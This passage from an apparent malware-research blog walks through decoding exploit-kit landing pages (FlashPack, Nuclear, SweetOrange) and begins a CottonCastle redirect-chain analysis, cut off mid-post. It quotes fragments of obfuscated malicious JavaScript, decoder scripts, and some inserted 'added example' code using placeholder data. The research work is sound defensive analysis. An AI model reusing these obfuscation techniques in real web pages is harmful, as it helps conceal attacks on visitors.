<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7i4QHnMLYorM9r-lDVpXKfgsgAunYOK-IXSfmi8l_lYxCBkgkIO4uernfgdeZRUJDWvLua7SUFqAU39zuiChsZqu6C4mboDe5EXkE2q3iO0GygO0AAqMafxXbJLvfRzPyZSS5cjTB0ND/s1600/Feb2015_FlashPack_decoded_image.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-7i4QHnMLYorM9r-lDVpXKfgsgAunYOK-IXSfmi8l_lYxCBkgkIO4uernfgdeZRUJDWvLua7SUFqAU39zuiChsZqu6C4mboDe5EXkE2q3iO0GygO0AAqMafxXbJLvfRzPyZSS5cjTB0ND/s1600/Feb2015_FlashPack_decoded_image.png" height="47" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">FlashPack malvertising Feb 2015 sample - part of decoded PNG file content</span></i></div>
<br />
'The operation was a complete success!' (c) Dr. Nick Riviera (The Simpsons)<br />
<br />
Our assumption was that at the end of the chained function calls we would have a string that can be split in two at the '<span style="color: #3d85c6;">&</span>' character, giving a URL and something else. Indeed, we got a <a href="https://urlquery.net/report.php?id=1423085400902" rel="nofollow" target="_blank">URL</a>, and the something else turned out to be part of the exploit shellcode.<br />
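The whole chain described above (images, decodeurl, hex2bin, split at '&'), as an added Python example that is not the post's own script. The two substitution alphabets, the pixel rows and the 'URL&amp;rest' plaintext are constructed stand-ins; the real '_loc3_'/'_loc2_' strings and bitmap live in the SWF sample.

```python
# Added example, not the post's own script: the FlashPack decoding chain as
# described above (images -> decodeurl -> hex2bin -> split at '&'), written
# against a plain list of pixel rows. The two alphabets and the payload are
# constructed stand-ins; the real '_loc3_'/'_loc2_' strings live in the SWF.

LOC3 = "abcdefghijklmnop"   # constructed: characters the pixel stage produces
LOC2 = "0123456789abcdef"   # constructed: the hex digits they stand for


def images(rows):
    """Stage 1 ('images'): walk every pixel of every row and turn each pixel
    value into one character."""
    return "".join(chr(pixel) for row in rows for pixel in row)


def decodeurl(text, loc3=LOC3, loc2=LOC2):
    """Stage 2 ('decodeurl'): monoalphabetic substitution. Each character is
    looked up in loc3 and replaced by the character at the same index in loc2."""
    out = []
    for ch in text:
        idx = loc3.find(ch)
        if idx < 0:
            raise ValueError(f"character {ch!r} is not in the lookup alphabet")
        out.append(loc2[idx])
    return "".join(out)


def hex2bin(hexstr):
    """Stage 3 ('hex2bin'): read two hex digits at a time, emit one character."""
    if len(hexstr) % 2:
        raise ValueError("hex string has odd length")
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def split_payload(decoded):
    """Final step: the plaintext is 'URL&<rest>'; split at the first '&'."""
    url, _, rest = decoded.partition("&")
    return url, rest


def decode_chain(rows):
    """Run all three stages and the final split on a list of pixel rows."""
    return split_payload(hex2bin(decodeurl(images(rows))))


def encode_for_demo(plaintext, width=8):
    """Inverse of the chain, used only to build the constructed pixel rows:
    plaintext -> hex -> loc3 letters -> rows of `width` pixel values."""
    letters = "".join(LOC3[LOC2.index(h)] for h in plaintext.encode("latin-1").hex())
    pixels = [ord(c) for c in letters]
    return [pixels[i:i + width] for i in range(0, len(pixels), width)]


# Constructed stand-in for the bitmap: the URL and the trailing data are
# placeholders, not values from the sample.
SAMPLE_ROWS = encode_for_demo("http://landing.example.invalid/f.php?id=1&PAYLOAD-PLACEHOLDER")

if __name__ == "__main__":
    url, rest = decode_chain(SAMPLE_ROWS)
    print("URL :", url)
    print("rest:", rest)
```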
<br />
That's all for now, folks!<br />
<br />
<b><span style="color: #3d85c6;">Credits</span></b><br />
<br />
<a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a> - invaluable intelligence sharing<br />
<a href="https://twitter.com/TimoHirvonen" rel="nofollow" target="_blank">@TimoHirvonen</a> - tremendous help with reverse engineering SWF files<br />
<br />
<b><span style="color: #3d85c6;">Tools Used</span></b><br />
<br />
Sulo - <a href="https://github.com/F-Secure/Sulo" rel="nofollow" target="_blank">https://github.com/F-Secure/Sulo</a><br />
JPEXS Free Flash Decompiler - <a href="https://www.free-decompiler.com/flash/" rel="nofollow" target="_blank">https://www.free-decompiler.com/flash/</a><br />
Kahu Security Converter Tool - <a href="http://www.kahusecurity.com/tools/" rel="nofollow" target="_blank">http://www.kahusecurity.com/tools/</a><br />
JetBrains PyCharm - <a href="https://www.jetbrains.com/pycharm/" rel="nofollow" target="_blank">https://www.jetbrains.com/pycharm/</a><br />
Notepad++ - <a href="http://notepad-plus-plus.org/" rel="nofollow" target="_blank">http://notepad-plus-plus.org/</a><br />
<br />
<br />
<h4>Deobfuscation tips: Nuclear EK landing page</h4>
<div style="text-align: left;"><i><span style="font-size: x-small;">Published 2014-09-23</span></i></div>
<br />
DISCLAIMER: There isn't a single way to deal with obfuscated data/code. There are many automated and semi-automated tools available to help you with that. In this post, though, I'll be using none. The aim here is to walk through some code deobfuscation manually. This is not a comprehensive Nuclear EK landing page analysis. Only the bits related to data/code obfuscation are covered.<br />
<br />
NOTE: The Exploit Kit sample used in this post was captured in September 2014. Given the ever-changing nature of EKs, what's described below might not apply to newer variants.<br />
<br />
<span style="color: #3d85c6;"><b>'Nuclear launch detected' </b></span><br />
<br />
I'll be using the Nuclear EK landing page sample <a href="http://pastebin.com/rPrghmdJ" rel="nofollow" target="_blank">here</a>. Note the huge blob of numbers stored in the '<span style="color: #3d85c6;"><span class="st0">G4Ah</span></span>' variable and the string stored in the '<span style="color: #3d85c6;">qjv</span>' variable. The string serves as a lookup key, and the numbers blob is actually a sequence of 2-digit numbers, each giving the position of a character in the '<span style="color: #3d85c6;">lookup key</span>'. The JavaScript on the landing page does quite a simple job - it splits the blob into 2-digit chunks, loops through each chunk, finds the character at that position in the '<span style="color: #3d85c6;">lookup key</span>' and adds the found character to a string. This might sound a bit confusing, so let's translate it into a Python script to better understand it.<br />
<br />
<pre class="prettyprint">lookupKey = "LOOKUP_KEY_GOES_HERE"
encodedString = "NUMBERS_BLOB_GOES_HERE"
# split the blob into 2-digit chunks (list() so len() also works on Python 3)
listOfValues = list(map(''.join, zip(*[iter(encodedString)] * 2)))
decodedString = ""
for index in range(len(listOfValues)):
    if int(listOfValues[index]) < 10:
        element = int(listOfValues[index])
    else:
        # compensate for the escape '\' characters present in the key
        element = int(listOfValues[index]) - 2
    decodedElement = lookupKey[element]
    decodedString += decodedElement
print(decodedString)</pre>
<br />
You'll notice an '<span style="color: #3d85c6;">if</span>' condition in the '<span style="color: #3d85c6;">lookup</span>' loop - for any value of 10 or greater, subtract 2 from it and then perform the lookup. This compensates for the escape '<span style="color: #3d85c6;">\</span>' characters in the lookup key. I'm not entirely sure why '<span style="color: #3d85c6;">10</span>', but I assume the code logic that generates the key will not include characters that require escaping in the first 10 character positions of the key.<br />
<br />
Before we can run the script we need to put the values into '<span style="color: #3d85c6;">lookupKey</span>' and '<span style="color: #3d85c6;">encodedString</span>'. While the value for '<span style="color: #3d85c6;">encodedString</span>' is hard to miss in the landing page code, finding the value for '<span style="color: #3d85c6;">lookupKey</span>' might be challenging. From my personal experience with Nuclear EK landings, I found that the character positions in the key are random, but its size is always 95 characters. The simplest, but not always reliable, way to find the lookup key is to search for a variable assigned a long string value. If this method fails you'll have to follow the JavaScript code to find it.<br />
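An added Python example (not the post's script) that decodes the same 2-digit-position scheme but avoids the fixed offset correction: it takes the lookup key as the quoted JS string literal you would copy from page source, unescapes it, and then indexes directly. Note that 95 is exactly the number of printable ASCII characters, so a key of that size is a full permutation of them; the key and blob below are constructed on those lines and are not values from the sample.

```python
import random

# Added example, not the post's script: decode the Nuclear scheme described
# above without the fixed "-2" correction, by first turning the lookup key
# from the quoted JS string literal seen in page source back into its runtime
# value. Key and blob below are constructed; real values come from the page.

PRINTABLE = "".join(chr(c) for c in range(32, 127))   # the 95 printable ASCII characters

_SIMPLE_ESCAPES = {"\\": "\\", "'": "'", '"': '"', "/": "/", "n": "\n", "t": "\t"}


def unescape_js_literal(literal):
    """Return the runtime value of a quoted JS string literal copied from page
    source. Escapes (backslash-quote, double backslash, \\xHH, ...) are collapsed
    so that character positions match what the landing page JavaScript indexes."""
    literal = literal.strip()
    if len(literal) < 2 or literal[0] not in "'\"" or literal[-1] != literal[0]:
        raise ValueError("expected a quoted JS string literal")
    body, out, i = literal[1:-1], [], 0
    while i < len(body):
        ch = body[i]
        if ch == "\\" and i + 1 < len(body):
            nxt = body[i + 1]
            if nxt == "x" and i + 3 < len(body):          # \xHH
                out.append(chr(int(body[i + 2:i + 4], 16)))
                i += 4
                continue
            out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
            i += 2
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def decode_nuclear(key, blob):
    """Each 2-digit chunk of the numbers blob is a position in the key."""
    if len(blob) % 2:
        raise ValueError("numbers blob must have an even number of digits")
    if len(key) != 95:
        raise ValueError(f"key is {len(key)} chars; the post reports 95 for this kit")
    out = []
    for i in range(0, len(blob), 2):
        pos = int(blob[i:i + 2])
        if pos >= len(key):
            raise ValueError(f"position {pos} is beyond the end of the key")
        out.append(key[pos])
    return "".join(out)


# --- constructed demo data --------------------------------------------------

def make_demo_key(seed=7):
    """Constructed key: a seeded permutation of printable ASCII, 95 characters
    long like the keys described in the post."""
    chars = list(PRINTABLE)
    random.Random(seed).shuffle(chars)
    return "".join(chars)


def to_js_literal(value):
    """Render a string as a double-quoted JS literal, as it would appear in the
    page source (backslash and double quote must be escaped)."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def encode_demo(plaintext, key):
    """Inverse of the scheme; only used to build the constructed blob."""
    return "".join(f"{key.index(ch):02d}" for ch in plaintext)


DEMO_KEY = make_demo_key()
DEMO_KEY_LITERAL = to_js_literal(DEMO_KEY)     # 99 source chars for a 95-char key
DEMO_BLOB = encode_demo("<script>var a=1;</script>", DEMO_KEY)


def demo():
    """What an analyst would do: unescape the copied literal, then decode."""
    key = unescape_js_literal(DEMO_KEY_LITERAL)
    return decode_nuclear(key, DEMO_BLOB)


if __name__ == "__main__":
    print(demo())
```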
<br />
Now, if we use the corresponding values from our landing page sample and run the script, we get the following <a href="http://pastebin.com/0UAxiCgi" rel="nofollow" target="_blank">output</a>.<br />
<br />
Another <a href="http://en.wikipedia.org/wiki/KISS_principle" rel="nofollow" target="_blank">KISS</a> approach to data obfuscation. Happy deobfuscation!<br />
<br />
<br />
<h4>Deobfuscation tips: SweetOrange EK landing page</h4>
<div style="text-align: left;"><i><span style="font-size: x-small;">Published 2014-09-18</span></i></div>
<br />
<u>DISCLAIMER</u>: There isn't a single way to deal with obfuscated data/code. There are many automated and semi-automated tools available to help you with that. In this post, though, I'll be using none. The aim here is to walk through some code deobfuscation manually. This is not a comprehensive SweetOrange EK landing page analysis. Only the bits related to data/code obfuscation are covered.<br />
<br />
<u>NOTE</u>: The Exploit Kit sample used in this post was captured in September 2014. Given the ever-changing nature of EKs, what's described below might not apply to newer variants.<br />
<br />
<span style="color: #3d85c6;"><b>Sweet and Sour</b></span><br />
<br />
I'll be using the SweetOrange EK landing page sample <a href="http://pastebin.com/iTVaKmr1" rel="nofollow" target="_blank">here</a>. Note the huge blob of text stored in one of the list items ('<span style="color: #3d85c6;">&lt;li&gt;</span>') followed by some JavaScript code. We'll skip the general code analysis/overview and focus on that tag. It has an '<span style="color: #3d85c6;">id</span>' attribute with a rather unique value - '<span style="color: #3d85c6;">UHOhpWHd</span>'. Searching for this value in the webpage code leads to the following JS function:<br />
<br />
<pre class="prettyprint">function uQqRecfwwf(DDDDDDDDD) {
    TLKQDEnOiE = 0;
    var ARNTO = uQqRecfwwf;
    var DnB = 0;
    UhOnd = String(Math.asin);
    if (isNaN(UhOnd.match(/aSI/ig))) {
        var k = (UhOnd.match(/In/i));
        if (k != null) {
            iuhquweh = trenoSZ(uyHMzLQ);
            XdwrQ["spl" + "ice"](Math.acos(1), 2, "UHOhpWHd");
            XdwrQ["spl" + "ice"](1, Math.acos(1), iuhquweh);
            ardddds = DDDDDDDDD;
            DnB = cXEcJlM()[qqTbFg()];
        };
    };
    return DnB;
}</pre>
<br />
At this stage it's unclear what exactly happens to the blob's data other than it being stored in the '<span style="color: #3d85c6;">XdwrQ</span>' array. Before we start chasing the rabbit down the hole and submerge into other functions, let's find out what calls the '<span style="color: #3d85c6;">uQqRecfwwf</span>' function.<br />
<br />
<pre class="prettyprint">aCaBOUakjB = uQqRecfwwf(BFG423SDFFSDF);</pre>
<br />
Ok, it's being called during a variable initialization. Are there any operations on this variable after the function call returns?<br />
<br />
<pre class="prettyprint">JvUhBCJkFV = aCaBOUakjB.substring(Math.acos(1) + 70).replace(/AdgSf344_42/, "");</pre>
<br />
The value returned is passed through '<span style="color: #3d85c6;">.substring</span>', which cuts off the first 70 characters, and then through '<span style="color: #3d85c6;">.replace</span>', which removes the '<span style="color: #3d85c6;">AdgSf344_42</span>' string; what's left is stored in another variable called '<span style="color: #3d85c6;">JvUhBCJkFV</span>'. Note the string being removed - '<span style="color: #3d85c6;">AdgSf344_42</span>'. It is present repeatedly all over the data blob, so it's safe enough to assume that these '<span style="color: #3d85c6;">replace</span>' and '<span style="color: #3d85c6;">substring</span>' operations are performed on the data stored in the blob. Now let's trace the '<span style="color: #3d85c6;">JvUhBCJkFV</span>' variable.<br />
<br />
<pre class="prettyprint">JvUhBCJkFV = JvUhBCJkFV["CmYhLBWtlcUAuPllrQzwcR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "QeTyvpnauVDwgPrSyUmddePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "hSReqJbsEYDVGYtSdMaKvAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/__hhg7_/, "<");
JvUhBCJkFV = JvUhBCJkFV["DFhBbAbrvTfutCnsmdcFnR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "pxUBkDdBwEcWypAIICsrJePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "mVrJDwMWDZuUhgpMZSmVEAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/__Db8__/, ">");
JvUhBCJkFV = JvUhBCJkFV["QOmUjeNOFcQYONcLQZAtOR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "bWXExXVfqvcqeIuyNfJaRePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "iebFbNjCVybBwfEvorJqqAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/_uio0__/, "&");
JvUhBCJkFV = JvUhBCJkFV["oZBZyFhKBOkJHNmWnmNCKR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "PIPoCStPfHZIWGgmYzekFePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "gfAOlzFwZvghrQYqhRPhnAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/__cc0__/, "%");</pre>
<br />
This is a little bit hard to read, isn't it? This is another type of code obfuscation used in this sample. Though it's not something I want to cover in this post, let's deobfuscate it for readability. Simply taking the code enclosed in square brackets and evaluating it in a JS sandbox yields the code below.<br />
<br />
<pre class="prettyprint">JvUhBCJkFV = JvUhBCJkFV.replace(/__hhg7_/, "<");
JvUhBCJkFV = JvUhBCJkFV.replace(/__Db8__/, ">");
JvUhBCJkFV = JvUhBCJkFV.replace(/_uio0__/, "&");
JvUhBCJkFV = JvUhBCJkFV.replace(/__cc0__/, "%");</pre>
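The bracketed property names above can also be recovered without running the JavaScript at all. The following is an added Python example (not the post's code) that statically resolves exactly the building blocks seen in those four lines: string literals with charAt, substr, toLowerCase and toString, plus the Math.acos(1) arithmetic (acos(1) is 0). The sample expression is the bracket content of the first obfuscated line quoted above.

```python
import ast
import operator
import re

# Added example, not the post's code: statically resolve the bracketed
# property-name expressions from the SweetOrange snippet above, instead of
# evaluating the JavaScript in a sandbox. It supports exactly the building
# blocks seen on the page: "literal".charAt(n), "literal".substr(n, len),
# .toLowerCase(), .toString(), Math.acos(1) (which is 0) and + - * arithmetic.

_ARITH = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def eval_index(expr):
    """Evaluate an index expression such as '(Math.acos(1) + 1) * 21' with a
    whitelist AST walk (no eval): only integers, parentheses and + - * pass."""
    src = expr.replace("Math.acos(1)", "0")

    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _ARITH:
            return _ARITH[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported index expression: {expr!r}")

    return walk(ast.parse(src.strip(), mode="eval").body)


def split_top_level(text, sep):
    """Split on `sep` only outside parentheses and string literals."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur))
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def _read_parens(text, start):
    """text[start] is '('; return (inner text, index just past the matching ')')."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[start + 1:i], i + 1
    raise ValueError("unbalanced parentheses")


def resolve_term(term):
    """Resolve one '"literal".method(...).method(...)' term to its string."""
    term = term.strip()
    m = re.match(r'"([^"]*)"', term)
    if not m:
        raise ValueError(f"term does not start with a string literal: {term!r}")
    value, pos = m.group(1), m.end()
    while pos < len(term):
        m = re.match(r"\s*\.(\w+)\s*\(", term[pos:])
        if not m:
            raise ValueError(f"unexpected text in term: {term[pos:]!r}")
        name = m.group(1)
        inner, pos = _read_parens(term, pos + m.end() - 1)
        args = [eval_index(a) for a in split_top_level(inner, ",") if a.strip()]
        if name == "charAt":
            value = value[args[0]] if 0 <= args[0] < len(value) else ""
        elif name == "substr":
            value = value[args[0]:args[0] + args[1]] if len(args) > 1 else value[args[0]:]
        elif name == "toLowerCase":
            value = value.lower()
        elif name == "toString":
            pass
        else:
            raise ValueError(f"unsupported method: {name}")
    return value


def resolve_property_name(bracket_expr):
    """Join the '+'-separated terms found between the square brackets."""
    return "".join(resolve_term(t) for t in split_top_level(bracket_expr, "+"))


# The bracket contents of the first obfuscated line quoted above.
SAMPLE_EXPR = (
    '"CmYhLBWtlcUAuPllrQzwcR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + '
    '"QeTyvpnauVDwgPrSyUmddePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + '
    '"hSReqJbsEYDVGYtSdMaKvAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)'
)

if __name__ == "__main__":
    print(resolve_property_name(SAMPLE_EXPR))
```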
<br />
More replacements!! Ok, let's do all of the above replacements and see if we get some readable code. The following simple Python script will help us do it:<br />
<br />
<pre class="prettyprint">def readFile(filename):
    # read the saved blob as text so that str.replace() works below
    fo = open(filename, "r")
    textFile = fo.read()
    fo.close()
    return textFile

encodedString = readFile('SW_landing.txt')
# mirror '.substring(Math.acos(1) + 70)': acos(1) is 0, so drop the first 70 characters
encodedString = encodedString[70:]
# then undo the five '.replace' calls found in the landing page JavaScript
encodedString = encodedString.replace('AdgSf344_42', '')
encodedString = encodedString.replace('__hhg7_', '<')
encodedString = encodedString.replace('__Db8__', '>')
encodedString = encodedString.replace('_uio0__', '&')
encodedString = encodedString.replace('__cc0__', '%')
print(encodedString)</pre>
<br />
Before running it, we'll need to save the data blob into the '<span style="color: #3d85c6;">SW_landing.txt</span>' file and place it in the same folder as the Python script. If you ever need to deobfuscate another SweetOrange EK landing page using this script, keep in mind that the replacement strings can change, though so far I've only seen the '<span style="color: #3d85c6;">.substring</span>' value and the first replacement string changing.<br />
<br />
After running the script we get the <a href="http://pastebin.com/WEcB6XTQ" rel="nofollow" target="_blank">output</a>. With the exception of some base64 encoded strings, the code is pretty readable and can be analyzed further if required. Now let's sum things up a little bit.<br />
<br />
So, from the data/code obfuscation perspective, the SweetOrange EK landing page contains a relatively big blob of obfuscated data and JavaScript that deobfuscates it into yet another JavaScript. The deobfuscation is implemented through a series of simple replacement operations. <a href="http://en.wikipedia.org/wiki/KISS_principle" rel="nofollow" target="_blank">KISS</a>.<br />
<br />
<br />
Happy deobfuscation!<br />
<br />
<br />
<h4>CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket."</h4>
<div style="text-align: left;"><i><span style="font-size: x-small;">Published 2014-06-08, updated 2014-06-11</span></i></div>
<br />
NOTE: The information is based on a sample captured on 2014-06-06<br />
<br />
Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing this sample.<br />
<br />
<u><i>Update 2014-06-10</i></u>: <a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a> <a href="http://malware.dontneedcoffee.com/2014/06/cottoncastle.html" rel="nofollow" target="_blank">shared</a> his experience with this exploit kit. Covers the history of the name, how it was first detected and what other exploits it has in its arsenal.<br />
<br />
<b><span style="color: #3d85c6;">Whenever there is any doubt, there is no doubt</span></b><br />
<br />
It's a rather interesting name for an exploit kit. Trying to find any references to '<span style="color: #3d85c6;">Cotton Castle</span>', you end up with links pointing at an amazing-looking location in Turkey - <a href="http://en.wikipedia.org/wiki/Pamukkale" rel="nofollow" target="_blank">Pamukkale</a>. I can't be sure whether the exploit kit name tips you off about the country of origin, but let's find out what it's made of so we better understand this threat.<br />
<br />
In this particular sample, the compromise attempt started with a visit to a webpage linking to a JavaScript file that starts the redirect chain. The following HTTP traffic was observed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrnImG-aGEx4P2NK3kdXvhrUSbolykrogLuCV_-ZyFlojO-WtiH-NYzQmvYNVcH7pj1H1o-kPKShWsXbtXob64SShrmAenjAAbeiMiBpairyxSKM77hrLUp0NT0DRHE1mh92U62qhfsYdO/s1600/HTTP_traffic.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrnImG-aGEx4P2NK3kdXvhrUSbolykrogLuCV_-ZyFlojO-WtiH-NYzQmvYNVcH7pj1H1o-kPKShWsXbtXob64SShrmAenjAAbeiMiBpairyxSKM77hrLUp0NT0DRHE1mh92U62qhfsYdO/s1600/HTTP_traffic.PNG" height="61" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' HTTP traffic</span></i></div>
<br />
The JavaScript starting the redirect chain is '<span style="color: #3d85c6;">jquery.place.min.js</span>'. According to almighty Google Search, the name belongs to a legitimate JavaScript application developed by '<a href="http://codecanyon.net/user/designcise" rel="nofollow" target="_blank">Designcise</a>' and meant to help web developers organize web page content. Nevertheless, in this particular case that's not what this script is doing at all. The script appears to check the following before initiating a redirect:<br />
<ul>
<li>the presence of the word '<span style="color: #3d85c6;">government</span>' in the current session '<span style="color: #3d85c6;">cookies</span>'</li>
<li>the types of '<span style="color: #3d85c6;">frames</span>', '<span style="color: #3d85c6;">XMLHttpRequest</span>' and '<span style="color: #3d85c6;">mozSetImageElement</span>'</li>
<li>the user's interaction with the webpage - mouseovers, clicks and movements</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF2crpGt00o96-RLOMOji6q_TGLNxJ8JbEI_lSJWNKxrTWcbaBs_bDIuKeWzjKe8Xq6PW_rKMol14o6Q9B1csUcWCEdFaEHXTdscwnWVa7KgoqIDjqFHGEjc8kihy3Ea5nEpoaU7Wnd6/s1600/JS_cookie&types_check.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF2crpGt00o96-RLOMOji6q_TGLNxJ8JbEI_lSJWNKxrTWcbaBs_bDIuKeWzjKe8Xq6PW_rKMol14o6Q9B1csUcWCEdFaEHXTdscwnWVa7KgoqIDjqFHGEjc8kihy3Ea5nEpoaU7Wnd6/s1600/JS_cookie&types_check.PNG" height="35" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript checking browser '<span style="color: #3d85c6;">cookies</span>' and some element types</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivZ7StO6u6OHMgjoKpB6bjY2OYYBXRlxoSTBElIby-6Vl7vXYqZNVrbQ8oM9SMQ8v369APaJNXBcS69UkQFEznYICmr2kebBmeTHVZhwxkZdvWmFY7C0YSRugLnS7iMxKlFm2J1MeqlolY/s1600/JS_mouse_monitoring.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivZ7StO6u6OHMgjoKpB6bjY2OYYBXRlxoSTBElIby-6Vl7vXYqZNVrbQ8oM9SMQ8v369APaJNXBcS69UkQFEznYICmr2kebBmeTHVZhwxkZdvWmFY7C0YSRugLnS7iMxKlFm2J1MeqlolY/s1600/JS_mouse_monitoring.PNG" height="140" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript hooking mouse activity</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL-3N3RwjpcR9Hxszgd1aj2jKlmhcTIDHbNPIahh2WfV3f3vK8BxRSpWLfdulmcAxgHNjpgI3YXwieJnPxsiaJgA171Pq9DlLm1X6Jp7IUWBYJwW_Y2hTxEVcwSdbVpsGucM-yUSdgPY7c/s1600/JS_event_listener&actioner.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL-3N3RwjpcR9Hxszgd1aj2jKlmhcTIDHbNPIahh2WfV3f3vK8BxRSpWLfdulmcAxgHNjpgI3YXwieJnPxsiaJgA171Pq9DlLm1X6Jp7IUWBYJwW_Y2hTxEVcwSdbVpsGucM-yUSdgPY7c/s1600/JS_event_listener&actioner.PNG" height="46" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript showing '<span style="color: #3d85c6;">EventListener</span>' and '<span style="color: #3d85c6;">attachEvent</span>'</span></i></div>
<br />
Once the conditions required for the redirect are met, the browser is redirected to an HTML page containing another JavaScript.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilL-cSuj9_HXxdFg6ArwrSzkYGHPthPjqtPTPKERKtp3fkgr3I9mEMRNth5eRMCptvYt8Aa4bsHg5UsgBI2_tSUz_07CSFU32oWJMnx2uLl60LocXtSSM1JT9UMPl1cHuW39Cg5sQIXaBV/s1600/JS_redirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilL-cSuj9_HXxdFg6ArwrSzkYGHPthPjqtPTPKERKtp3fkgr3I9mEMRNth5eRMCptvYt8Aa4bsHg5UsgBI2_tSUz_07CSFU32oWJMnx2uLl60LocXtSSM1JT9UMPl1cHuW39Cg5sQIXaBV/s1600/JS_redirect.PNG" height="132" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript showing the function initiating the redirect</span></i></div>
<br />
This type of behaviour can be found on some news/ad-rich websites where additional content is pulled based on the user's interaction with the page, and this case might be exactly that, but we'll carry on assuming this activity is malicious.<br />
<br />
The webpage the browser is taken to is rather simple in terms of the content - 1 line of text that looks like a news headline.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCPfgpNMX7E6P0OoalGVN_Y7GlX37s03hX7o2OVItaoc0BVf2zQUdm7wzWUWphSMZ06Qz6dUgoA3lDhbGl2VjLjMMsPJvc0FJK2QO6k-7QZZ73tZWw_cG0OgSd-B9AyB4VX52nN61ranus/s1600/first_HTML.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCPfgpNMX7E6P0OoalGVN_Y7GlX37s03hX7o2OVItaoc0BVf2zQUdm7wzWUWphSMZ06Qz6dUgoA3lDhbGl2VjLjMMsPJvc0FJK2QO6k-7QZZ73tZWw_cG0OgSd-B9AyB4VX52nN61ranus/s1600/first_HTML.PNG" height="57" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of the page showing the line of text and an &lt;iframe&gt;</span></i></div>
<br />
Let's take a look at some <a href="http://who.is/whois/leveloped.in" rel="nofollow" target="_blank">WHOIS</a> data for the domain hosting this page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
